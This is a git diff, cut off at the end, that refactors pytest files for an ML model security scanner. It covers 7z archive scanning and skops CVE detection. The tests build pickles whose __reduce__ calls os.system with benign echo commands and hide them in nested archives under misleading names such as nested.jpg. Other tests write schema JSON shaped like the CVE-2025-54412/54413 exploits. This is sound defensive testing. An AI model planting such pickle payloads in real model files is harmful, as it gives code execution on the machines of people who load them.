"misnamed_inner.7z" - temp_pickle_path = tmp_path / "payload.pkl" - with temp_pickle_path.open("wb") as temp_pickle: - pickle.dump(MaliciousClass(), temp_pickle) - - try: - with py7zr.SevenZipFile(inner_7z_path, "w") as archive: - archive.write(str(temp_pickle_path), "payload.pkl") - - with py7zr.SevenZipFile(temp_7z_file, "w") as archive: - archive.write(str(inner_7z_path), "nested.jpg") - - result = scanner.scan(temp_7z_file) - - system_symbols = { - "os.system", - f"{os.system.__module__}.system", - } - nested_issues = [ - issue - for issue in result.issues - if issue.location - and f"{temp_7z_file}:nested.jpg:payload.pkl" in issue.location - and any(symbol in issue.message.lower() for symbol in system_symbols) - ] - assert result.success is False - assert len(nested_issues) > 0 - assert any(issue.severity == IssueSeverity.CRITICAL for issue in nested_issues) - - finally: - if temp_pickle_path.exists(): - temp_pickle_path.unlink() - if inner_7z_path.exists(): - inner_7z_path.unlink() + _assert_misnamed_nested_archive( + scanner, + tmp_path, + temp_7z_file, + "misnamed_inner.7z", + "payload.pkl", + "echo disguised_7z_nested", + "nested.jpg", + ) @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_scan_misnamed_nested_7z_archive_prioritizes_disguised_member_over_fillers( @@ -537,17 +433,11 @@ def test_scan_misnamed_nested_7z_archive_prioritizes_disguised_member_over_fille """High-priority disguised members should still be probed ahead of low-value fillers.""" import py7zr # type: ignore[import-untyped] - class MaliciousClass: - def __reduce__(self): - import os as os_module - - return (os_module.system, ("echo disguised_7z_nested",)) - scanner = SevenZipScanner(config={"max_7z_extensionless_probes": 1}) inner_7z_path = tmp_path / "misnamed_inner.7z" temp_pickle_path = tmp_path / "payload.pkl" with temp_pickle_path.open("wb") as temp_pickle: - pickle.dump(MaliciousClass(), temp_pickle) + pickle.dump(SystemCommandPayload("echo disguised_7z_nested"), temp_pickle) try: with py7zr.SevenZipFile(inner_7z_path, "w") as archive: @@ -591,47 +481,15 @@ def test_scan_misnamed_nested_7z_archive_low_value_suffix_still_probed( tmp_path: Path, ) -> None: """Low-value suffixes like .txt should still be eligible for header probing.""" - import py7zr # type: ignore[import-untyped] - - class MaliciousClass: - def __reduce__(self): - import os as os_module - - return (os_module.system, ("echo disguised_7z_low_value",)) - - inner_7z_path = tmp_path / "misnamed_inner_low_value.7z" - temp_pickle_path = tmp_path / "payload_low_value.pkl" - with temp_pickle_path.open("wb") as temp_pickle: - pickle.dump(MaliciousClass(), temp_pickle) - - try: - with py7zr.SevenZipFile(inner_7z_path, "w") as archive: - archive.write(str(temp_pickle_path), "payload.pkl") - - with py7zr.SevenZipFile(temp_7z_file, "w") as archive: - archive.write(str(inner_7z_path), "nested.txt") - - result = scanner.scan(temp_7z_file) - - system_symbols = { - "os.system", - f"{os.system.__module__}.system", - } - nested_issues = [ - issue - for issue in result.issues - if issue.location - and f"{temp_7z_file}:nested.txt:payload.pkl" in issue.location - and any(symbol in issue.message.lower() for symbol in system_symbols) - ] - assert result.success is False - assert len(nested_issues) > 0 - assert any(issue.severity == IssueSeverity.CRITICAL for issue in nested_issues) - finally: - if temp_pickle_path.exists(): - temp_pickle_path.unlink() - if inner_7z_path.exists(): - inner_7z_path.unlink() + _assert_misnamed_nested_archive( + scanner, + tmp_path, + temp_7z_file, + "misnamed_inner_low_value.7z", + "payload_low_value.pkl", + "echo disguised_7z_low_value", + "nested.txt", + ) @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_scan_safe_misnamed_nested_7z_archive_has_no_critical_findings( @@ -813,15 +671,9 @@ def test_scan_malicious_joblib_in_7z_end_to_end(self, scanner: SevenZipScanner, """A malicious .joblib nested in .7z must produce the same critical findings as a top-level scan.""" import py7zr # type: ignore[import-untyped] - class MaliciousJoblib: - def __reduce__(self): - import os as os_module - - return (os_module.system, ("echo nested_joblib_payload",)) - joblib_path = Path(temp_7z_file).with_name("payload.joblib") with joblib_path.open("wb") as handle: - pickle.dump(MaliciousJoblib(), handle) + pickle.dump(SystemCommandPayload("echo nested_joblib_payload"), handle) try: with py7zr.SevenZipFile(temp_7z_file, "w") as archive: @@ -927,18 +779,6 @@ def test_nested_critical_scan_does_not_mark_7z_extraction_incomplete(self, tmp_p archive_path = tmp_path / "model.7z" archive_result = ScanResult(scanner_name="sevenzip") - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_result = ScanResult(scanner_name="test_nested") - nested_result.add_check( - name="Nested Critical Finding", - passed=False, - message="Nested member is malicious", - severity=IssueSeverity.CRITICAL, - location=path, - ) - nested_result.finish(success=False) - return nested_result - scanner = SevenZipScanner(config={NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan}) scan_complete = scanner._scan_extracted_file( str(extracted_path), @@ -1396,15 +1236,6 @@ def scanner(self): """Create a SevenZipScanner instance for testing""" return SevenZipScanner() - @pytest.fixture - def temp_7z_file(self): - """Create a temporary file with .7z extension for testing""" - with tempfile.NamedTemporaryFile(suffix=".7z", delete=False) as f: - temp_path = f.name - yield temp_path - if os.path.exists(temp_path): - os.unlink(temp_path) - def test_default_configuration(self): """Test default scanner configuration""" scanner = SevenZipScanner() @@ -1512,15 +1343,6 @@ def test_large_extracted_file_handling(self, scanner: SevenZipScanner, temp_7z_f class TestSevenZipScannerHardening: """Red-team tests for security hardening introduced in the review.""" - @pytest.fixture - def temp_7z_file(self) -> Generator[str, None, None]: - """Create a temporary file with .7z extension for testing""" - with tempfile.NamedTemporaryFile(suffix=".7z", delete=False) as f: - temp_path = f.name - yield temp_path - if os.path.exists(temp_path): - os.unlink(temp_path) - @pytest.fixture def scanner(self) -> SevenZipScanner: return SevenZipScanner() @@ -1958,14 +1780,13 @@ def test_extensionless_probe_limit_hidden_payload_exits_inconclusive( """An uninspected payload after the probe cap must not produce a clean or invented finding.""" import py7zr # type: ignore[import-untyped] - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (os.system, ("echo hidden_after_probe_cap",)) - archive_path = tmp_path / "hidden_probe_limit.7z" with py7zr.SevenZipFile(archive_path, "w") as archive: archive.writestr(b"ordinary notes", "first_payload") - archive.writestr(pickle.dumps(DangerousPayload(), protocol=0), "second_payload") + archive.writestr( + pickle.dumps(SystemCommandPayload("echo hidden_after_probe_cap", lambda: os.system), protocol=0), + "second_payload", + ) config = {"max_7z_extensionless_probes": 1} result = SevenZipScanner(config=config).scan(str(archive_path)) @@ -1986,13 +1807,11 @@ def test_extensionless_probe_limit_preserves_observed_security_finding(self, tmp """An inspected malicious member must stay a security finding despite later incomplete coverage.""" import py7zr # type: ignore[import-untyped] - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (os.system, ("echo detected_before_probe_cap",)) - archive_path = tmp_path / "observed_probe_limit.7z" payload_path = tmp_path / "observed_payload" - payload_path.write_bytes(pickle.dumps(DangerousPayload(), protocol=0)) + payload_path.write_bytes( + pickle.dumps(SystemCommandPayload("echo detected_before_probe_cap", lambda: os.system), protocol=0) + ) with py7zr.SevenZipFile(archive_path, "w") as archive: archive.write(payload_path, "first_payload") archive.writestr(b"ordinary notes", "second_payload") @@ -2184,16 +2003,10 @@ def test_disguised_nested_zip_member_detects_malicious_payload_end_to_end(self, """A ZIP payload hidden behind an image suffix inside 7z must still be scanned.""" import py7zr # type: ignore[import-untyped] - class MaliciousClass: - def __reduce__(self) -> tuple[Any, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo disguised_zip_in_7z",)) - pickle_path = tmp_path / "payload.pkl" nested_zip_path = tmp_path / "nested.zip" archive_path = tmp_path / "outer.7z" - self._write_pickle(pickle_path, MaliciousClass()) + self._write_pickle(pickle_path, SystemCommandPayload("echo disguised_zip_in_7z")) with zipfile.ZipFile(nested_zip_path, "w") as archive: archive.write(pickle_path, "payload.pkl") with py7zr.SevenZipFile(archive_path, "w") as archive: @@ -2211,24 +2024,7 @@ def __reduce__(self) -> tuple[Any, tuple[str]]: @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_disguised_xgboost_member_detects_malicious_payload_end_to_end(self, tmp_path: Path) -> None: - pytest.importorskip("ubjson", reason="ubjson not installed") - import py7zr # type: ignore[import-untyped] - - payload_path = tmp_path / "model_payload" - payload_path.write_bytes(_xgboost_ubjson_probe(malicious=True)) - archive_path = tmp_path / "disguised_xgboost.7z" - with py7zr.SevenZipFile(archive_path, "w") as archive: - archive.write(payload_path, "models/model.jpg") - - result = scan_model_directory_or_file(str(archive_path), cache_enabled=False) - - assert determine_exit_code(result) == 1 - assert any( - issue.location - and f"{archive_path}:models/model.jpg" in issue.location - and "System call in JSON" in str(issue.message) - for issue in result.issues - ) + _assert_xgboost_archive_suffix(tmp_path, "disguised_xgboost.7z", "models/model.jpg") @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_probe_limit_preserves_disguised_xgboost_security_finding(self, tmp_path: Path) -> None: @@ -2260,40 +2056,17 @@ def test_probe_limit_preserves_disguised_xgboost_security_finding(self, tmp_path @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_json_suffixed_xgboost_member_detects_malicious_payload_end_to_end(self, tmp_path: Path) -> None: - pytest.importorskip("ubjson", reason="ubjson not installed") - import py7zr # type: ignore[import-untyped] - - payload_path = tmp_path / "model_payload" - payload_path.write_bytes(_xgboost_ubjson_probe(malicious=True)) - archive_path = tmp_path / "json_suffixed_xgboost.7z" - with py7zr.SevenZipFile(archive_path, "w") as archive: - archive.write(payload_path, "models/model.json") - - result = scan_model_directory_or_file(str(archive_path), cache_enabled=False) - - assert determine_exit_code(result) == 1 - assert any( - issue.location - and f"{archive_path}:models/model.json" in issue.location - and "System call in JSON" in str(issue.message) - for issue in result.issues - ) + _assert_xgboost_archive_suffix(tmp_path, "json_suffixed_xgboost.7z", "models/model.json") @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_disguised_nested_tar_member_detects_malicious_payload_end_to_end(self, tmp_path: Path) -> None: """A TAR payload hidden behind an opaque suffix inside 7z must still be scanned.""" import py7zr # type: ignore[import-untyped] - class MaliciousClass: - def __reduce__(self) -> tuple[Any, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo disguised_tar_in_7z",)) - pickle_path = tmp_path / "payload.pkl" nested_tar_path = tmp_path / "nested.tar" archive_path = tmp_path / "outer_tar.7z" - self._write_pickle(pickle_path, MaliciousClass()) + self._write_pickle(pickle_path, SystemCommandPayload("echo disguised_tar_in_7z")) with tarfile.open(nested_tar_path, "w") as archive: archive.add(pickle_path, arcname="payload.pkl") with py7zr.SevenZipFile(archive_path, "w") as archive: @@ -2353,15 +2126,9 @@ def test_python_named_pickle_still_reaches_nested_pickle_scanning(self, tmp_path """A pickle disguised as Python source must not stop at AST inspection.""" import py7zr # type: ignore[import-untyped] - class MaliciousClass: - def __reduce__(self) -> tuple[Any, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo disguised_python_pickle",)) - payload_path = tmp_path / "payload.pkl" archive_path = tmp_path / "python_named_pickle.7z" - self._write_pickle(payload_path, MaliciousClass()) + self._write_pickle(payload_path, SystemCommandPayload("echo disguised_python_pickle")) with py7zr.SevenZipFile(archive_path, "w") as archive: archive.write(payload_path, "assets/payload.py") @@ -2953,11 +2720,7 @@ def test_extensionless_proto0_pickle_probe_reaches_full_extraction(self, tmp_pat patch("os.path.islink", return_value=False), patch("os.path.getsize", return_value=32), ): - - def fake_extract(*_args: Any, **kwargs: Any) -> None: - factory = kwargs.get("factory") - if factory is not None: - factory.create("nested_payload").write(payload) + fake_extract = _nested_payload_extractor(payload) mock_archive = MagicMock() mock_archive.getnames.return_value = ["nested_payload"] @@ -2991,11 +2754,7 @@ def test_extensionless_xgboost_probe_reaches_full_extraction(self, tmp_path: Pat patch("os.path.islink", return_value=False), patch("os.path.getsize", return_value=32), ): - - def fake_extract(*_args: Any, **kwargs: Any) -> None: - factory = kwargs.get("factory") - if factory is not None: - factory.create("nested_payload").write(payload) + fake_extract = _nested_payload_extractor(payload) mock_archive = MagicMock() mock_archive.getnames.return_value = ["nested_payload"] @@ -3029,11 +2788,7 @@ def test_extensionless_xgboost_incomplete_learner_probe_reaches_full_extraction( patch("os.path.islink", return_value=False), patch("os.path.getsize", return_value=32), ): - - def fake_extract(*_args: Any, **kwargs: Any) -> None: - factory = kwargs.get("factory") - if factory is not None: - factory.create("nested_payload").write(payload) + fake_extract = _nested_payload_extractor(payload) mock_archive = MagicMock() mock_archive.getnames.return_value = ["nested_payload"] @@ -3067,11 +2822,7 @@ def test_extensionless_xgboost_incomplete_root_probe_reaches_full_extraction(sel patch("os.path.islink", return_value=False), patch("os.path.getsize", return_value=32), ): - - def fake_extract(*_args: Any, **kwargs: Any) -> None: - factory = kwargs.get("factory") - if factory is not None: - factory.create("nested_payload").write(payload) + fake_extract = _nested_payload_extractor(payload) mock_archive = MagicMock() mock_archive.getnames.return_value = ["nested_payload"] @@ -3091,39 +2842,13 @@ def fake_extract(*_args: Any, **kwargs: Any) -> None: @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_extensionless_xgboost_late_model_key_in_7z_fails_closed_in_routing(self, tmp_path: Path) -> None: - import py7zr # type: ignore[import-untyped] - - payload_path = tmp_path / "model" - payload_path.write_bytes( - _xgboost_ubjson_probe(learner_padding=SevenZipScanner._XGBOOST_NESTED_MEMBER_PROBE_BYTES, malicious=True) - ) - archive_path = tmp_path / "late_model.7z" - with py7zr.SevenZipFile(archive_path, "w") as archive: - archive.write(payload_path, arcname="models/model") - - result = scan_model_directory_or_file(str(archive_path), cache_enabled=False) - - assert determine_exit_code(result) == 2 - assert any("routing was inconclusive" in str(issue.message) for issue in result.issues) - assert not any("System call in JSON" in str(issue.message) for issue in result.issues) + # type: ignore[import-untyped] + _assert_7z_late_xgboost_key_inconclusive(tmp_path, ("late_model.7z"), ("models/model")) @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_disguised_xgboost_late_model_key_in_7z_fails_closed_in_routing(self, tmp_path: Path) -> None: - import py7zr # type: ignore[import-untyped] - - payload_path = tmp_path / "model" - payload_path.write_bytes( - _xgboost_ubjson_probe(learner_padding=SevenZipScanner._XGBOOST_NESTED_MEMBER_PROBE_BYTES, malicious=True) - ) - archive_path = tmp_path / "late_disguised.7z" - with py7zr.SevenZipFile(archive_path, "w") as archive: - archive.write(payload_path, arcname="models/model.jpg") - - result = scan_model_directory_or_file(str(archive_path), cache_enabled=False) - - assert determine_exit_code(result) == 2 - assert any("routing was inconclusive" in str(issue.message) for issue in result.issues) - assert not any("System call in JSON" in str(issue.message) for issue in result.issues) + # type: ignore[import-untyped] + _assert_7z_late_xgboost_key_inconclusive(tmp_path, ("late_disguised.7z"), ("models/model.jpg")) @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_extensionless_xgboost_late_learner_in_7z_fails_closed_in_routing(self, tmp_path: Path) -> None: @@ -3311,35 +3036,7 @@ def test_duplicate_archive_entries_fail_closed( tmp_path: Path, ) -> None: """Duplicate archive members must be treated as ambiguous and fail closed.""" - safe_pickle = tmp_path / "safe.pkl" - evil_pickle = tmp_path / "evil.pkl" - archive_path = tmp_path / "duplicate.7z" - - self._write_pickle(safe_pickle, {"safe": True}) - - class MaliciousClass: - def __reduce__(self) -> tuple[Any, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo duplicate_7z_shadow",)) - - self._write_pickle(evil_pickle, MaliciousClass()) - - import py7zr # type: ignore[import-untyped] - - with py7zr.SevenZipFile(archive_path, "w") as archive: - archive.write(str(safe_pickle), "dup.pkl") - archive.write(str(evil_pickle), "dup.pkl") - - result = scanner.scan(str(archive_path)) - - assert result.success is False - duplicate_checks = [check for check in result.checks if check.name == "7z Duplicate Entry Protection"] - assert len(duplicate_checks) == 1 - assert duplicate_checks[0].status == CheckStatus.FAILED - assert duplicate_checks[0].severity == IssueSeverity.WARNING - assert duplicate_checks[0].details["first_entry"] == "dup.pkl" - assert duplicate_checks[0].details["entry"] == "dup.pkl" + _assert_duplicate_entries(scanner, self, tmp_path, "duplicate.7z", "echo duplicate_7z_shadow", "dup.pkl") @pytest.mark.skipif(not HAS_PY7ZR, reason="py7zr not available") def test_duplicate_archive_entry_aliases_fail_closed( @@ -3348,35 +3045,9 @@ def test_duplicate_archive_entry_aliases_fail_closed( tmp_path: Path, ) -> None: """Canonical path collisions such as subdir/../dup.pkl must fail closed.""" - safe_pickle = tmp_path / "safe.pkl" - evil_pickle = tmp_path / "evil.pkl" - archive_path = tmp_path / "duplicate_alias.7z" - - self._write_pickle(safe_pickle, {"safe": True}) - - class MaliciousClass: - def __reduce__(self) -> tuple[Any, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo duplicate_alias_7z_shadow",)) - - self._write_pickle(evil_pickle, MaliciousClass()) - - import py7zr # type: ignore[import-untyped] - - with py7zr.SevenZipFile(archive_path, "w") as archive: - archive.write(str(safe_pickle), "dup.pkl") - archive.write(str(evil_pickle), "subdir/../dup.pkl") - - result = scanner.scan(str(archive_path)) - - assert result.success is False - duplicate_checks = [check for check in result.checks if check.name == "7z Duplicate Entry Protection"] - assert len(duplicate_checks) == 1 - assert duplicate_checks[0].status == CheckStatus.FAILED - assert duplicate_checks[0].severity == IssueSeverity.WARNING - assert duplicate_checks[0].details["first_entry"] == "dup.pkl" - assert duplicate_checks[0].details["entry"] == "subdir/../dup.pkl" + _assert_duplicate_entries( + scanner, self, tmp_path, "duplicate_alias.7z", "echo duplicate_alias_7z_shadow", "subdir/../dup.pkl" + ) # Integration test that requires actual test assets @@ -3403,3 +3074,122 @@ def test_scan_sample_archives_if_available(self, assets_dir): # Basic assertion - scan should complete assert result is not None assert hasattr(result, "success") + + +def _assert_7z_late_xgboost_key_inconclusive(tmp_path: Path, filename: str, member_name: str) -> None: + import py7zr # type: ignore[import-untyped] + + payload_path = tmp_path / "model" + payload_path.write_bytes( + _xgboost_ubjson_probe(learner_padding=SevenZipScanner._XGBOOST_NESTED_MEMBER_PROBE_BYTES, malicious=True) + ) + archive_path = tmp_path / filename + with py7zr.SevenZipFile(archive_path, "w") as archive: + archive.write(payload_path, arcname=member_name) + + result = scan_model_directory_or_file(str(archive_path), cache_enabled=False) + + assert determine_exit_code(result) == 2 + assert any("routing was inconclusive" in str(issue.message) for issue in result.issues) + assert not any("System call in JSON" in str(issue.message) for issue in result.issues) + + +def _assert_duplicate_entries( + scanner: SevenZipScanner, + self: TestSevenZipScannerHardening, + tmp_path: Path, + archive_name: str, + command: str, + duplicate_name: str, +) -> None: + safe_pickle = tmp_path / "safe.pkl" + evil_pickle = tmp_path / "evil.pkl" + archive_path = tmp_path / archive_name + + self._write_pickle(safe_pickle, {"safe": True}) + + self._write_pickle(evil_pickle, SystemCommandPayload(command)) + + import py7zr # type: ignore[import-untyped] + + with py7zr.SevenZipFile(archive_path, "w") as archive: + archive.write(str(safe_pickle), "dup.pkl") + archive.write(str(evil_pickle), duplicate_name) + + result = scanner.scan(str(archive_path)) + + assert result.success is False + duplicate_checks = [check for check in result.checks if check.name == "7z Duplicate Entry Protection"] + assert len(duplicate_checks) == 1 + assert duplicate_checks[0].status == CheckStatus.FAILED + assert duplicate_checks[0].severity == IssueSeverity.WARNING + assert duplicate_checks[0].details["first_entry"] == "dup.pkl" + assert duplicate_checks[0].details["entry"] == duplicate_name + + +def _assert_misnamed_nested_archive( + scanner: SevenZipScanner, + tmp_path: Path, + temp_7z_file: str, + inner_name: str, + pickle_name: str, + command: str, + member_name: str, +) -> None: + import py7zr # type: ignore[import-untyped] + + inner_7z_path = tmp_path / inner_name + temp_pickle_path = tmp_path / pickle_name + with temp_pickle_path.open("wb") as temp_pickle: + pickle.dump(SystemCommandPayload(command), temp_pickle) + + try: + with py7zr.SevenZipFile(inner_7z_path, "w") as archive: + archive.write(str(temp_pickle_path), "payload.pkl") + + with py7zr.SevenZipFile(temp_7z_file, "w") as archive: + archive.write(str(inner_7z_path), member_name) + + result = scanner.scan(temp_7z_file) + + system_symbols = { + "os.system", + f"{os.system.__module__}.system", + } + nested_issues = [ + issue + for issue in result.issues + if issue.location + and f"{temp_7z_file}:{member_name}:payload.pkl" in issue.location + and any(symbol in issue.message.lower() for symbol in system_symbols) + ] + assert result.success is False + assert len(nested_issues) > 0 + assert any(issue.severity == IssueSeverity.CRITICAL for issue in nested_issues) + + finally: + if temp_pickle_path.exists(): + temp_pickle_path.unlink() + if inner_7z_path.exists(): + inner_7z_path.unlink() + + +def _assert_xgboost_archive_suffix(tmp_path: Path, archive_name: str, member_name: str) -> None: + pytest.importorskip("ubjson", reason="ubjson not installed") + import py7zr # type: ignore[import-untyped] + + payload_path = tmp_path / "model_payload" + payload_path.write_bytes(_xgboost_ubjson_probe(malicious=True)) + archive_path = tmp_path / archive_name + with py7zr.SevenZipFile(archive_path, "w") as archive: + archive.write(payload_path, member_name) + + result = scan_model_directory_or_file(str(archive_path), cache_enabled=False) + + assert determine_exit_code(result) == 1 + assert any( + issue.location + and f"{archive_path}:{member_name}" in issue.location + and "System call in JSON" in str(issue.message) + for issue in result.issues + ) diff --git a/tests/scanners/test_skops_content_analysis.py b/tests/scanners/test_skops_content_analysis.py index 8fe857e5e..7b0649d33 100644 --- a/tests/scanners/test_skops_content_analysis.py +++ b/tests/scanners/test_skops_content_analysis.py @@ -5,6 +5,7 @@ from modelaudit.scanners.base import CheckStatus, IssueSeverity from modelaudit.scanners.skops_scanner import SkopsScanner +from tests.helpers.scanners import assert_skops_cve_clean class TestSkopsScannerContentAnalysis: @@ -12,50 +13,24 @@ class TestSkopsScannerContentAnalysis: def test_detects_malicious_operatorfuncnode_in_schema(self, tmp_path: Path) -> None: """Test detection of exploit-shaped OperatorFuncNode schema content.""" - skops_file = tmp_path / "model.skops" - with zipfile.ZipFile(skops_file, "w") as zf: - zf.writestr( - "schema.json", - '{"__loader__": "OperatorFuncNode", "__module__": "builtins", "__class__": "eval"}', - ) - - scanner = SkopsScanner() - result = scanner.scan(str(skops_file)) - - cve_checks = [c for c in result.checks if "CVE-2025-54412" in c.name] - assert len(cve_checks) > 0 - assert cve_checks[0].status == CheckStatus.FAILED - assert cve_checks[0].severity == IssueSeverity.CRITICAL - # Verify it detected the structured loader, not a filename. - details = cve_checks[0].details - patterns_matched = details.get("patterns_matched", []) - assert any("loader:" in p for p in patterns_matched) + _assert_skops_malicious_schema_node( + tmp_path, + ('{"__loader__": "OperatorFuncNode", "__module__": "builtins", "__class__": "eval"}'), + ("CVE-2025-54412"), + ) def test_detects_malicious_methodnode_in_schema(self, tmp_path: Path) -> None: """Test detection of exploit-shaped MethodNode schema content.""" - skops_file = tmp_path / "model.skops" - with zipfile.ZipFile(skops_file, "w") as zf: - zf.writestr( - "schema.json", - ( - '{"__loader__": "MethodNode", "__module__": "builtins", "__class__": "str", ' - '"content": {"obj": {"__module__": "os", "__class__": "system"}}}' - ), - ) - - scanner = SkopsScanner() - result = scanner.scan(str(skops_file)) - - cve_checks = [c for c in result.checks if "CVE-2025-54413" in c.name] - assert len(cve_checks) > 0 - assert cve_checks[0].status == CheckStatus.FAILED - assert cve_checks[0].severity == IssueSeverity.CRITICAL - # Verify it detected the structured loader, not a filename. - details = cve_checks[0].details - patterns_matched = details.get("patterns_matched", []) - assert any("loader:" in p for p in patterns_matched) + _assert_skops_malicious_schema_node( + tmp_path, + ( + '{"__loader__": "MethodNode", "__module__": "builtins", "__class__": "str", ' + '"content": {"obj": {"__module__": "os", "__class__": "system"}}}' + ), + ("CVE-2025-54413"), + ) def test_reduce_in_content_not_flagged(self, tmp_path: Path) -> None: """__reduce__ is a standard Python serialization method and should NOT trigger CVE-2025-54412.""" @@ -79,10 +54,7 @@ def test_getattr_prose_without_methodnode_loader_is_not_flagged(self, tmp_path: zf.writestr("schema.json", '{"version": "1.0"}') scanner = SkopsScanner() - result = scanner.scan(str(skops_file)) - - cve_checks = [c for c in result.checks if "CVE-2025-54413" in c.name] - assert not [c for c in cve_checks if c.status == CheckStatus.FAILED] + assert_skops_cve_clean(scanner, skops_file, "CVE-2025-54413") def test_clean_file_no_content_detection(self, tmp_path: Path) -> None: """Test that clean files without malicious content don't trigger.""" @@ -109,10 +81,7 @@ def test_operatorfuncnode_prose_and_filename_without_loader_are_not_flagged(self zf.writestr("schema.json", '{"version": "1.0"}') scanner = SkopsScanner() - result = scanner.scan(str(skops_file)) - - cve_checks = [c for c in result.checks if "CVE-2025-54412" in c.name] - assert not [c for c in cve_checks if c.status == CheckStatus.FAILED] + assert_skops_cve_clean(scanner, skops_file, "CVE-2025-54412") def test_valid_loader_nodes_are_not_flagged(self, tmp_path: Path) -> None: """Normal Skops loader nodes should not be treated as exploit payloads.""" @@ -136,3 +105,25 @@ def test_valid_loader_nodes_are_not_flagged(self, tmp_path: Path) -> None: cve_54413 = [c for c in result.checks if "CVE-2025-54413" in c.name and c.status == CheckStatus.FAILED] assert cve_54412 == [] assert cve_54413 == [] + + +def _assert_skops_malicious_schema_node(tmp_path: Path, schema: str, check_name: str) -> None: + skops_file = tmp_path / "model.skops" + with zipfile.ZipFile(skops_file, "w") as zf: + zf.writestr( + "schema.json", + schema, + ) + + scanner = SkopsScanner() + result = scanner.scan(str(skops_file)) + + cve_checks = [c for c in result.checks if check_name in c.name] + assert len(cve_checks) > 0 + assert cve_checks[0].status == CheckStatus.FAILED + assert cve_checks[0].severity == IssueSeverity.CRITICAL + + # Verify it detected the structured loader, not a filename. + details = cve_checks[0].details + patterns_matched = details.get("patterns_matched", []) + assert any("loader:" in p for p in patterns_matched) diff --git a/tests/scanners/test_skops_scanner.py b/tests/scanners/test_skops_scanner.py index a3701865b..df6e5bccb 100644 --- a/tests/scanners/test_skops_scanner.py +++ b/tests/scanners/test_skops_scanner.py @@ -1,12 +1,11 @@ """Tests for SkopsScanner covering CVE-2025-54412, CVE-2025-54413, CVE-2025-54886.""" -import builtins import os import stat import textwrap import zipfile from pathlib import Path -from typing import Any, Literal +from typing import Any import pytest @@ -16,6 +15,12 @@ from modelaudit.scanners import zip_scanner as zip_scanner_module from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity, ScanResult from modelaudit.scanners.skops_scanner import SkopsScanner +from tests.helpers.scanners import ( + assert_preflighted_archive_survives_replacement, + assert_skops_cve_clean, + install_zip_open_failure, +) +from tests.helpers.text import LowerCountingText SAMPLES_DIR = os.path.join(os.path.dirname(os.path.dirname(__file__)), "assets", "samples") @@ -67,13 +72,6 @@ def _assert_inconclusive_reason(metadata: Any, reason: str) -> None: def test_protocol_probe_reuses_lowered_member_names() -> None: """Keep ZIP member normalization linear while probing large archives.""" - class CountingMemberName(str): - lower_calls = 0 - - def lower(self) -> str: - self.lower_calls += 1 - return super().lower() - class FakeZipFile: def __init__(self, member_name: str) -> None: self.member_name = member_name @@ -81,7 +79,7 @@ def __init__(self, member_name: str) -> None: def namelist(self) -> list[str]: return [self.member_name] - member_name = CountingMemberName("archive/member.txt") + member_name = LowerCountingText("archive/member.txt") SkopsScanner()._check_protocol_version( FakeZipFile(member_name), # type: ignore[arg-type] @@ -127,21 +125,11 @@ class TestSkopsScannerCVE2025_54412: def test_detects_malicious_operatorfuncnode_loader(self, tmp_path: Path) -> None: """OperatorFuncNode nodes outside the operator module should be detected.""" - skops_file = tmp_path / "malicious.skops" - with zipfile.ZipFile(skops_file, "w") as zf: - zf.writestr( - "schema.json", - '{"__loader__": "OperatorFuncNode", "__module__": "builtins", "__class__": "eval"}', - ) - - scanner = SkopsScanner() - result = scanner.scan(str(skops_file)) - - assert result.success is False - cve_checks = [c for c in result.checks if "CVE-2025-54412" in c.name] - assert len(cve_checks) > 0 - assert cve_checks[0].status == CheckStatus.FAILED - assert cve_checks[0].severity == IssueSeverity.CRITICAL + _assert_skops_malicious_loader_node( + tmp_path, + ('{"__loader__": "OperatorFuncNode", "__module__": "builtins", "__class__": "eval"}'), + ("CVE-2025-54412"), + ) def test_reduce_pattern_no_false_positive(self, tmp_path: Path) -> None: """Test that __reduce__ filenames do NOT trigger CVE-2025-54412. @@ -189,10 +177,7 @@ def test_valid_operatorfuncnode_loader_is_not_flagged(self, tmp_path: Path) -> N '{"__loader__": "OperatorFuncNode", "__module__": "operator", "__class__": "methodcaller"}', ) - result = SkopsScanner().scan(str(skops_file)) - - cve_checks = [c for c in result.checks if "CVE-2025-54412" in c.name] - assert not [c for c in cve_checks if c.status == CheckStatus.FAILED] + assert_skops_cve_clean(SkopsScanner(), skops_file, "CVE-2025-54412") class TestSkopsScannerCVE2025_54413: @@ -200,24 +185,14 @@ class TestSkopsScannerCVE2025_54413: def test_detects_malicious_methodnode_loader(self, tmp_path: Path) -> None: """MethodNode nodes whose wrapped object type disagrees should be detected.""" - skops_file = tmp_path / "malicious.skops" - with zipfile.ZipFile(skops_file, "w") as zf: - zf.writestr( - "schema.json", - ( - '{"__loader__": "MethodNode", "__module__": "builtins", "__class__": "str", ' - '"content": {"obj": {"__module__": "os", "__class__": "system"}}}' - ), - ) - - scanner = SkopsScanner() - result = scanner.scan(str(skops_file)) - - assert result.success is False - cve_checks = [c for c in result.checks if "CVE-2025-54413" in c.name] - assert len(cve_checks) > 0 - assert cve_checks[0].status == CheckStatus.FAILED - assert cve_checks[0].severity == IssueSeverity.CRITICAL + _assert_skops_malicious_loader_node( + tmp_path, + ( + '{"__loader__": "MethodNode", "__module__": "builtins", "__class__": "str", ' + '"content": {"obj": {"__module__": "os", "__class__": "system"}}}' + ), + ("CVE-2025-54413"), + ) def test_getattr_filename_without_methodnode_loader_is_not_flagged(self, tmp_path: Path) -> None: """Plain filenames should not stand in for structured MethodNode entries.""" @@ -227,10 +202,7 @@ def test_getattr_filename_without_methodnode_loader_is_not_flagged(self, 